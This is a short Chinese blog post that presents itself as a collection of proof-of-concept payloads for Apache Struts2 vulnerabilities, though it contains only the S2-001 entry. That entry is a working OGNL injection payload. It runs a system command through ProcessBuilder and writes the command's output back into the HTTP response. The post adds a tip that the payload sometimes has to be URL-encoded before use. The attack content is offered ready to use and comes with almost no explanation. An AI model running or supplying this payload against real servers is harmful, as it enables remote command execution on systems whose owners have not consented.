Struct2系列漏洞POC整理

Struct2 -001

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

有的时候需要urlencode一下才能使用。
利用截图:
image

posted @ 2023-05-29 09:57  Ssh1y  阅读(66)  评论(0)    收藏  举报